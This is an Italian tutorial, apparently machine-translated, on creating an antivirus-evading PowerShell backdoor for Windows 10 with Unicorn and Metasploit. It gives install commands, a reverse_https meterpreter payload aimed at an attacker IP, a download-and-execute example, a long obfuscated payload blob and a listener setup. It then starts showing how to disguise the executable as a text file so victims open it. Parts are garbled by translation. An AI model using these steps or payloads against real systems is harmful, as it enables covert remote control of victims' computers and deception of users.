Creazione di un payload irriconoscibile per bypassare un antivirus su win10

  

 

 

Stasera ci divertiamo un poco, ricordo a quei due gatti che mi seguono di non fare casino e fare tutto a casa con vm e ferri vostri, se vi beccano fate la figura dei pirla e vi beccano; questi sono piccoli laboratori che facciamo in mentalità ethical; per quanto mi riguarda se devi difenderti e difendere aziende che capiscono e ti fanno lavorare preferisco conoscere anche gli attacchi più banali; mi è capitato poco tempo fa che un cliente avesse preso un ransomware e di beccare il ragazzino che lo aveva comprato già compilato e iniettato chiedendo poi riscatto all'azienda; ho fatto risparmiare l'azienda e ho fatto capire al ragazzino che questo gioco può diventare pericoloso, se entri in una banca con una pistola giocattolo, non ucciderai nessuno ma rischi che facciano fuori te; insomma detto ciò vediamo di usare un pò anche l'amato unicorn con metasploit e fare qualcosa di semplice:

Gli hacker sono sempre alla ricerca di exploit zero-day in grado di superare con successo le funzionalità di sicurezza di Windows 10. Sono state condotte ricerche approfondite per creare malware non rilevabili e interi progetti GitHub per automatizzare la creazione di payload irriconoscibili come WinPaylods, Veil v3 e TheFatRat. Usando un pò di ingegneria sociale per convincere un utente di destinazione ad aprire un file malevolo si può semplicemente mettere un po' di Unicode nel nome del file. Ad esempio, la seguente GIF mostra un file eseguibile di Windows (EXE) mascherato da un file di testo normale (TXT), anche se in Spiegazione Esplora file non è disponibile l'opzione Nascondi tipi di file conosciuti esistenti, Vedi al punto 5) la spiegazione del procedimento.

Non commettere errori, il file sulla destra è un eseguibile e, cosa più importante, è fatto da Windows Sistema operativo riconosciuto come un file eseguibile. Quando si fa clic sul file di testo sbagliato, si apre un nuovo documento con Blocco note, l'editor di testo predefinito in Windows 10. Dopo aver aperto Blocco note, esegue automaticamente un payload di PowerShell incorporato (con unicorn), che è una backdoor per  compromettere l'orario del  Computer Windows.

Unicorn, sviluppato da TrustedSec, è un semplice strumento progettato per supportare i test di penetrazione con attacchi di downgrade di PowerShell e per immettere direttamente in memoria il carico utile del codice shell sofisticato. Le tecniche utilizzate da Unicorn sono basate sul lavoro di Matthew Graeber e del fondatore di TrustedSec David Kennedy .

1: Installare Metasploit Framework

Metasploit è una dipendenza di Unicorn. Prima di installare Unicorn, guido rapidamente i lettori attraverso un'installazione di metasploit per assicurarmi che sia aggiornato con il repository GitHub.

Kali fa un ottimo lavoro nel mantenere versioni stabili di Metasploit, ma ti mostrerò come installare l'ultima versione assoluta. Innanzitutto, rimuovi le versioni precedenti di Metasploit che potrebbero essere preinstallate in Kali.

  apt-get remove metasploit-framework 

Quindi utilizzare cURL per scaricare il programma di installazione Metasploit.

  curl https: // raw. githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall 

Aggiorna i permessi del file msfinstall appena creati per assicurarti che siano in Esecuzione di Kali

  chmod 755 msfinstall 

Quindi eseguire lo script di installazione con ./ msfinstall .

  ./ msfinstall off

Aggiungi il framework metasploit all'elenco dei repository..OK
Aggiorna la cache del pacchetto..OK
Cerca aggiornamenti e installa ..
Leggi gli elenchi dei pacchetti ... Fatto
Crea una struttura di dipendenza
Leggi le informazioni sullo stato ... Fatto
Verranno installati i seguenti NUOVI pacchetti:
Metasploit Framework
0 aggiornato, 1 reinstallato, 0 rimosso e 124 non aggiornato.
Sono necessari 161 MB di archivi.
Dopo questo processo, verranno utilizzati 377 MB di memoria aggiuntiva.
Ottieni: 1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid / main amd64 metasploit-framework amd64 4.16.57 + 20180529103642.git.4.6219ce0 ~ 1rapid7-1 [161 MB]
Ottieni: 1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid / main amd64 metasploit-framework amd64 4.16.57 + 20180529103642.git.4.6219ce0 ~ 1rapid7-1 [161 MB]
Raggiunto 65,7 MB in 11 minuti 39 secondi (93,9 kB / s)
Seleziona il pacchetto metasploit-framework precedentemente non selezionato.
(Lettura del database ... 145965 I file e le directory sono attualmente installati.)
Preparazione per il disimballaggio ... / metasploit-framework_4.16.57 + 20180529103642.git.4.6219ce0 ~ 1rapid7-1_amd64.deb ...
Disimballare Metasploit Framework (4.16.57 + 20180529103642.git.4.6219ce0 ~ 1rapid7-1) ...
Configurare Metasploit Framework (4.16.57 + 20180529103642.git.4.6219ce0 ~ 1rapid7-1) ...
alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfbinscan per fornire / usr / bin / msfbinscan (msfbinscan) in modalità automatica
alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfconsole per montare / usr / bin / msfconsole (msfconsole) in modalità automatica
aggiornamento-alternative: utilizzare / opt / metasploit-framework / bin / msfd per fornire / usr / bin / msfd (msfd) in modalità automatica
Alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfdb per montare / usr / bin / msfdb (msfdb) in modalità automatica
alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfelsfscan per fornire / usr / bin / msfelscan (msfelscan) in modalità automatica
aggiornamento-alternative: utilizzare / opt / metasploit-framework / bin / msfmachscan per fornire / usr / bin / msfmachscan (msfmachscan) in modalità automatica
alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfpescan per fornire / usr / bin / msfpescan (msfpescan) in modalità automatica
Alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfrop per montare / usr / bin / msfrop (msfrop) in modalità automatica
alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfrpc per montare / usr / bin / msfrpc (msfrpc) in modalità automatica
aggiornamento-alternative: utilizzare / opt / metasploit-framework / bin / msfrpcd per fornire / usr / bin / msfrpcd (msfpcd) in modalità automatica
alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfupdate per fornire / usr / bin / msfupdate (msfupdate) in modalità automatica
aggiornamento-alternative: utilizzare / opt / metasploit-framework / bin / msfvenom per fornire / usr / bin / msfvenom (msfvenom) in modalità automatica
alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / metasploit-aggregator per fornire / usr / bin / metasploit-aggregator in modalità automatica
Esegui msfconsole per iniziare
W: --force-yes è deprecato, usa invece una delle opzioni che iniziano con --allow. 

Al termine dell'installazione, la directory / opt contiene una nuova directory metasploit-framework /.

2) installare Unicorn

Quando si installa Metasploit, il repository GitHub Unicorn può essere clonato con git clone github.com/trustedsec/unicorn.

 git clone https: //github.com/trustedsec/unicorn

Clona in un unicorno ...
remote: contando gli oggetti: 340, done.
remote: totale 340 (delta 0), riutilizzato 0 (delta 0), pacchetto riutilizzato 340
Ricezione di oggetti: 100% (340/340), 163,94 KiB | 45,00 KiB / s, finito.
Delta risoluzione: 100% (215/215), fatto 

Quindi utilizzare il comando cd per passare alla nuova directory Unicorn.

  cd unicorn / 

Per vedere le opzioni Unicorn disponibili Per una descrizione completa di ciascun attacco, vedere ./unicorn.py –help argomento.

  ./unicorn.py --help

-------------------- Magic Unicorn Attack Vector v3.1 ----------------------- - -----

Native x86 powershell injection attack su qualsiasi piattaforma Windows.
Scritto da: Dave Kennedy presso TrustedSec (https://www.trustedsec.com)
Twitter: @ TrustedSec, @HackingDave
Crediti: Matthew Graeber, Justin Elze, Chris Gates

Happy unicorn magic

Utilizzo: python unicorn.py payload reverse_ipaddr port 
Esempio PS: python unicorn.py windows / meterpreter / reverse_https 192.168.1.5 443
PS Down / Exec: Python Unicorn.py windows / download_exec URL = http: //badurl.com/payload.exe
Esempio di macro: python unicorn.py windows / meterpreter / reverse_https 192.168.1.5 443 macro
Esempio di macro CS: python unicorn.py  Macro CS
Macro esempio di shellcode: python unicorn.py  macro shellcode
Esempio HTA: python unicorn.py windows / meterpreter / reverse_https 192.168.1.5 443 hta
HTA Esempio CS: python unicorn.py  cs hta
Esempio di shellcode HTA: python unicorn.py : shellcode hta
Esempio DDE: python unicorn.py windows / meterpreter / reverse_https 192.168.1.5 443 dde
CRT Esempio: python unicorn.py  crt
Esempio di PS1 personalizzato: python unicorn.py 
Esempio PS1 personalizzato: python unicorn.py  macro 500
Colpo di cobalto Esempio: python unicorn.py  cs (Export CS in C #)
Codice shell personalizzato: python unicorn.py  shellcode (formattato 0x00)
Menu Aiuto: python unicorn.py --help 

Ci sono alcune opzioni di unicorno interessanti ed efficaci. In questo articolo, mi concentrerò sulla soluzione PowerShell e Meterpreter.

3: Generazione del payload

Utilizzare il seguente comando per creare un payload con Unicorn:

  ./ Unicorn. py windows / meterpreter / reverse_https   

Unicorn usa il modulo Metasploit reverse_https per connettersi all'indirizzo IP dell'aggressore tramite la porta specificata.

  [*] Genera il codice shell del payload. Questo potrebbe richiedere alcuni secondi / minuti mentre creiamo lo shellcode ...

, /
//
, //
___ / | | //
`__ /  _ - (/ | ___ / - /
 |  _-  ___ __-_ `- / - / .
|  _-___, -  _____-- / _) & # 39; 
 -_ / __  (`(__`  |
` __ | | ) / (/ |
, ._____., & # 39; - // - |  | "/
/ __. , / /, --- |  /
/ / _.   & # 39; / `_ / _, & # 39; | |
| | (( |, /  & # 39; __ / & # 39; / | | |
|   `-,` _ / _ ------ ______ /  () /
| |   _. ,  ___ / 
| |  _   
   _   / 
   ._  __  _ | | 
  ___   | 
 __  __   _ |  |
|  _____  ____ | |
|   __ --- & # 39; .__  | | |
  __ --- /) |  /
  ____ / / () ( & # 39; ---_ / | |
 __________ / (, --__  _________. | ./ |
|   & # 39; ---_  -,   _ ,. / |
|   _ ` /` ---_______- \ /
  .___, `| /  
 |  _  |  (|: |
   | / / | | ;
    (`_ & # 39;  |
.  .  & # 39; __ / | |
  .  | |
    ()
 |  | | |
| \  Me`
(__; (_; (& # 39; -_ & # 39 ;;
| ___   ___:  ___:

aHR0cHM6Ly93d3cuYmlYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc =

Scritto da: Dave Kennedy presso TrustedSec (https://www.trustedsec.com)
Twitter: @ TrustedSec, @HackingDave

Happy unicorn magic.

[********************************************************************************************************]

----- ISTRUZIONI DI ATTACCO POWERSHELL ----

Tutto è ora creato in due file, powershell_attack.txt e unicorn.rc. Il file di testo contiene tutto il codice necessario per iniettare in memoria l'attacco di PowerShell. Si noti che è necessaria una posizione che supporti in qualche modo le iniezioni di comandi remoti. Spesso ciò potrebbe essere dovuto a un documento Excel / Word o tramite psexec_commands in Metasploit, SQLi, ecc. Ci sono così tante implicazioni e scenari in cui è possibile utilizzare questo attacco. Basta inserire il comando powershell_attack.txt in qualsiasi finestra del prompt dei comandi, oppure è possibile richiamare il file eseguibile di PowerShell e recuperare la shell. Questo attacco supporta anche Windows / download_exec per un metodo di payload invece dei payload meterpreter.Se si sta utilizzando il download e l'exec, è sufficiente inserire python unicorn.py windows / download_exec url = https: //www.thisisnotarealsite.com/payload.exe e il codice PowerShellscaricherà ed eseguirà il payload.


Nota che devi abilitare un ascoltatore per rilevare l'attacco.

[*******************************************************************************************************]
	
[*]   Codice di output di PowerShell esportato in powershell_attack.txt.
[*] Esportato il file Metasploit RC come unicorn.rc. Eseguire msfconsole -r unicorn.rc per eseguire e creare listener. 

Quando Unicorn ha generato il payload, vengono creati due nuovi file. Il primo è powershell_attack.txt che può essere visualizzato con il comando catpowershell_attack.txt . Questo visualizza il codice PowerShell che viene eseguito sul computer di destinazione di Windows 10 e si connette al misuratore.

  cat powershell_attack.txt

powershell / w 1 / C "s # 39; v Mx -; s # 39; v CV e # 39; s # 39; (g & # 39; v Mx) .value.toString() + (g & # 39; v CV) .value.toString ()); powershell (g & # 39; v nU) .value.toString ()(& # 39; JAB GEAdABpAG AGMAMAAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMAAsADAAeAAzADAALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAwAGMALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADQALAAwAHgAOABiACwAMAB4ADcAMgAsADAAeAAyADgALAAwAHgAMABmACwAMAB4AGIANwAsADAAeAA0AGEALAAwA HgAMgA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAZQAyACwAMAB4AGYAMgAsADAAeAA1ADIALAAwAHgANQA3ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQAwACwAMAB4ADgAYgAsADAAeAA0AGEALAAwAHgAMwBjACwAMAB4ADgAYgAsADAAeAA0AGMALAAwAHgAMQAxACwAMAB4ADcAOAAsADAAeABlADMALAAwAHgANAA4ACwAMAB4ADAAMQAsADAAeABkADEALAAwAHgANQAxACwAMAB4ADgAYgAsADAAeAA1ADkALAAwAHgAMgAwACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADQAOQAsADAAeAAxADgALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB 4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANgAsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQA0ACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwA HgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxACwAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQBmACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlAGIALAAwAHgAOABkACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgANgBlACwAMAB4ADYANQAsADAAeAA3ADQALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANgA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMA B4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADMAYQAsADAAeAA1ADYALAAwAHgANwA5ACwAMAB4AGEANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeABiAGIALAAwA HgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAZQA4ACwAMAB4AGIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyAGYALAAwAHgAMwA2ACwAMAB4ADMANAAsADAAeAA1ADIALAAwAHgANgAxACwAMAB4ADcAMgAsADAAeAAzADQALAAwAHgANQA3ACwAMAB4ADQAMgAsADAAeAA3ADkALAAwAHgANQAwACwAMAB4ADcANAAsADAAeAA3ADYALAAwAHgAMwAwACwAMAB4ADUANwAsADAAeAAzADcALAAwAHgANQAxACwAMAB4ADQAZQAsADAAeAA0AGUALAAwAHgAMwA0ACwAMAB4ADUANQAsADAAeAA0ADYALAAwAHgANQAxACwAMAB4ADMAMgAsADAAeAA1ADUALAAwAHgANQAxACwAMAB4ADcAMQAsADAAeAA3ADIALAAwAHgANwA5ACwAMAB4ADQAZQAsADAAeAAwADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADkAZgAsADAAeABjADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADkALAAwAHgAYwA2ACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADMA & # 39; + # 39; MgAsADAAeABlADAALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4ADAAYQAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADgAMAAsADAAeAAzADMALA AwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA4ADkALAAwAHgAZQAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQAwACwAMAB4ADYAYQAsADAAeAAxAGYALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgANAA2ACwAMAB4ADkAZQAsADAAeAA4ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAyAGQALAAwAHgAMAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANAA0ACwAMAB4AGYAMAAsADAAeAAzADUALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANABmACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADU ANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALA AwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgAOAA5ACwAMAB4AGUANwAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAxADIALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeABjAGQALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4AGUANQAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADUAZgAsADAAeABlADgALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeAAzADkALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADIAZQAsADAAeAAzADUALAAwAHgAMAAwADsAJABxAF YAIAA9ACAAMAB4ADEAMAAwADcAOwBpAGYAIAAoACQAdABUAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAHEAVgAgAD0AIAAkAHQAVAAuAEwAZQBuAGcAdABoAH0AOwAkAHEAZQA9ACQAWABkADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAANwAsACQAcQBWACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAWABEAD0AMAA7ACQAWABEACAALQ BsAGUAIAAoACQAdABUAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAFgARAArACsAKQAgAHsAJABYAGQAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAGUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAWABEACkALAAgACQAdABUAFsAJABYAEQAXQAsACAAMQApAH0AOwAkAFgAZAA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQBlACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABFAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAdABUAFYAKQApADsAJABCAHYAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgA è) [19659010] L'altro file che è stato creato da Unicorn,  unicorn.rc  è un file di risorse che contiene l'installazione e la configurazione di  msfconsole  automatizzare [19659006;DgAKQB7ACQAcABMACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHAATAAgACQAQgB2ACAAJABFAGQAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQgB2ACAAAgAgAAgA7AH0A&#39]  Passaggio 4: Avviare Msfconsole con il file di risorse 
  Per avviare Metasploit, eseguire il comando  msfconsole -r /opt/unicorn/unicorn.rc 
 
  msfconsole -r / opt / unicorn / unicorn.rc

= [ metasploit v4.16.59-dev-                        ]
+ - - = [ 1769 exploits - 1008 auxiliary - 307 post       ]
+ - - = [ 537 payloads - 41 encoders - 10 nops            ]
+ - - = [ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*]   Elaborazione /opt/unicorn/unicorn.rc per la politica ERB.
Risorsa (/opt/unicorn/unicorn.rc)> Usa Multi / Handler
Risorsa (/opt/unicorn/unicorn.rc)> Imposta finestra payload / meterpreter / reverse_https
Payload => Windows / Meterpreter / Reverse_https
Risorsa (/opt/unicorn/unicorn.rc)> imposta LHOST 192.168.1.5
LHOST => 192.168.1.5
Risorsa (/opt/unicorn/unicorn.rc)> Imposta LPORT 443
LPORT => 443
Risorsa (/opt/unicorn/unicorn.rc)> imposta ExitOnSession false
ExitOnSession => false
resource (/opt/unicorn/unicorn.rc)> Imposta EnableStageEncoding su true
EnableStageEncoding => true
Risorsa (/opt/unicorn/unicorn.rc)> Exploit -j
[*] Exploit è in esecuzione come processo in background 0.

[-] Il gestore non è stato in grado di eseguire il binding a 192.168.1.5:443
msf exploit (multi / handler)> [*] Avviato handler HTTPS su https://0.0.0.0:443
Il file di risorse attiva automaticamente il gestore ( multi / handler ), impostare il tipo di 
utilità ( windows / meterpreter / reverse_https ), impostare l'indirizzo IP dell'utente
 malintenzionato ( LHOST ), impostare il numero di porta ( LPORT ), attivare il Codifica Stager 
( EnableStageEncoding ), e avvia il listener msfconsole ( exploit -j ) - facile. 
A questo punto tutto è impostato sul lato dell'attaccante e pronto per le connessioni in entrata. 
Ora tutto ciò che conta è verificare che il payload funzioni e aggiri efficacemente Windows Defender
e il software antivirus. 

5) test del payload (non caricare su VirusTotal)

Nei miei test, il carico utile di PowerShell di Unicorn ha aggirato i rilevamenti di Avast di Google Chrome, Windows Defender e in un computer Windows 10 Enterprise completamente aggiornato ,

Molti progetti mettono in guardia i tester di penetrazione dai pericoli dell'utilizzo di scanner antivirus online come VirusTotal. Nel caso di TheFatRat, lo sviluppatore avverte espressamente contro l'utilizzo di VirusTotal ogni volta che viene avviato il programma.

Come qualcuno che ha regolarmente sperimentato molti software di bypass antivirus, capisco la tentazione di sapere se il carico utile creato sta rilevando bypasserà le più diffuse tecnologie antivirus. Tuttavia, il caricamento su scanner di virus online è estremamente dannoso per questi progetti. VirusTotal suddivide i payload con i fornitori di terze parti, aumentando drasticamente i tassi di riconoscimento generali in breve tempo.

In alternativa agli scanner online, incoraggio Pentester a simulare l'ambiente del sistema operativo della loro destinazione con macchine virtuali. Ad esempio, se rileva che una destinazione sulla rete locale utilizza Windows 10 con AVG o Avast, crea una macchina virtuale Windows 10, installa il software antivirus più recente nella VM e verifica il carico utile nella VM. Ciò fornisce al pen-tester la certezza che un payload funzioni correttamente e impedisce a Virus Total di analizzare il file dannoso e di condividere i risultati con altre società.

Ecco per installare Metasploit, creare il payload di PowerShell con Unicorn e automatizzare il processo di avvio di msfconsole Unicorn è un ottimo strumento che ti consente di creare payload avanzati di PowerShell difficile da bypassare il software antivirus comune. Nel mio articolo di follow-up, mostro come trasformare il codice di PowerShell in un file eseguibile e fare alcuni trucchi per far apparire l'eseguibile come un semplice file di testo.

Una volta che un hacker ha creato un payload PowerShell per eludere il software antivirus e impostato msfconsole sul proprio sistema di attacco, può quindi passare a camuffare il proprio eseguibile per farlo apparire come un normale file di testo. Questo è il modo in cui gli utenti di Windows 10 apriranno effettivamente il payload senza sapere che lo stanno facendo.
Il payload PowerShell generato da Unicorn funziona come previsto se usato sul computer Windows 10 di destinazione. Crea una connessione HTTPS inversa per tornare alla configurazione di Kali dell'attaccante mentre elude attivamente i rilevamenti di Windows Defender e Avast antivirus . È tutto fantastico, ma la vera sfida è indurre l'utente di Windows di destinazione a eseguire il codice sul proprio computer.

• A tale scopo, è possibile eseguire alcune operazioni sul payload di PowerShell prima di inviarlo alla vittima. Il payload deve essere convertito in un eseguibile di Windows (EXE). Anche l'icona (file ICO) dovrà essere modificata per apparire come un normale file di testo. La più grande bandiera rossa che il file di testo falso è in realtà un eseguibile è l'estensione del file. Alcuni utenti Windows disabilitano l' opzione " Nascondi le estensioni per i tipi di file conosciuti " per proteggersi dagli attacchi di spoofing delle estensioni dei file. In questo articolo, mostrerò come falsificare le estensioni di file, anche con estensioni di file non nascoste.

Per i lettori che potrebbero aver saltato la prima parte di questo articolo , ecco di nuovo la GIF che mostra di nuovo i file di testo reali e falsi fianco a fianco:

Il file a sinistra è un vero file di testo. Il file a destra è il payload di PowerShell, progettato per aprire il Blocco note prima di eseguire il payload di PowerShell.Passo 1Salva il carico utile di PowerShell
I passaggi seguenti richiedono un sistema operativo Windows. Consiglio di utilizzare una macchina virtuale (VM) Windows 10 in VirtualBox, WmVare Fusion o Parallels. Io uso Kali su Parallels in MacOS. Ma questo exploit l'ho fatto da console Unix e funziona.
Su Amazon: Guida di VirtualBox per principianti
Prima di andare oltre, il payload di PowerShell creato in precedenza deve essere spostato nel sistema Windows e salvato come payload.bat utilizzando Blocco note o un editor di testo preferito. Il payload.bat verrà manipolato per apparire come un normale file di testo nei passaggi successivi.Passo 2Scarica le icone di Windows 10
Le icone di Windows 10 dovranno essere scaricate per iniziare a trasformare il payload.bat in un falso file di testo. Queste icone verranno utilizzate per falsificare l'icona del file. Puoi scaricare le icone di Windows 10 utilizzando git clone "https://github.com/B00merang-Project/Windows-10-Icons" .
~$ git clone 'https://github.com/B00merang-Project/Windows-10-Icons'
Cloning into 'Windows-10-Icons'...
remote: Counting objects: 3495, done.
remote: Total 3495 (delta 0), reused 0 (delta 0), pack-reused 3495
Receiving objects: 100% (3495/3495), 14.69 MiB | 294.00 KiB/s, done.
Resolving deltas: 100% (393/393), done.
Checking connectivity... done.
Questo repository potrebbe non contenere repliche esatte delle icone di Windows 10 integrate ma apparire abbastanza vicino e funzionerà bene per gli scopi di questo articolo. Se i lettori sono in grado di progettare icone o localizzare icone migliori online, incoraggio l'uso di quelle.
Sto usando text-x-generic.png che si trova nella directory Windows-10-Icons / 256x256 / mimetypes /, ma qualsiasi PNG funzionerà per continuare a seguirlo.Passaggio 3Converti il ​​PNG in formato ICO
Il PNG dovrà essere convertito nel formato icona ICO di Windows. Questo può essere fatto utilizzando strumenti online come ConvertICO . Carica semplicemente il PNG desiderato sul sito web e lo riprodurrà in formato ICO. Salva il nuovo ICO con il nome file fakeTextFile.ico .

Passaggio 4Installa BAT2EXE
Ho già descritto BAT2EXE (B2E) in un articolo . Questo è un ottimo strumento per convertire i file BAT in eseguibili di Windows.
